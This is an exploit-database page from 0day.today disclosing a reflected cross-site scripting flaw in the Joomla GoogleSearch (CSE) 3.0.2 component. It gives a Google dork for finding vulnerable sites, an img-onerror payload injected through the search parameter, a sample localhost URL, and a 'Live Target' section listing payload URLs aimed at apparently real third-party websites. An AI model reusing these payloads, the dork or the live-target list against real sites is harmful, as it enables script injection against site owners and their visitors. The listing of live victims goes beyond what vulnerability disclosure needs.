[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla GoogleSearch (CSE) 3.0.2 Cross Site Scripting Vulnerability

Author
Bet0
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24181
Category
web applications
Date add
01-09-2015
Platform
php
##############################################
#Exploit title: Joomla Component GoogleSearch (CSE) 3.0.2 - XSS Vulnerability
#Author: Bet0
#Twitter: https://twitter.com/Bet0_Shinoda
#Website: www.mc-crew.or.id
#Google Dork: inurl:"index.php?option=com_googlesearch_cse"
#Date: 29 Agustus 2015
#Vendor Homepage: www.kksou.com
#Plugins Link: http://extensions.joomla.org/extensions/7023/details
#Tested on: Mozila Firefox 40.0 and Ubuntu 15.04
##############################################

[+]Piye om Carane (PoC)

1. Go to Columns Search Input The malicious code "><img src=x onerror=prompt(1)>

[+]Sample
http://127.0.0.1/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q="><img src=x onerror=prompt(1)>&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com


[+]Live Target
http://ufoforceX.com/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com

http://www.liXnuxcnc.org/index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=017093687396734519753%3Ao_92rwvgxxw&cof=FORID%3A9&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3E&sa=Search&hl=en&siteurl=http%3A%2F%2Fwww.linuxcnc.org%2F

#  0day.today [2024-12-25]  #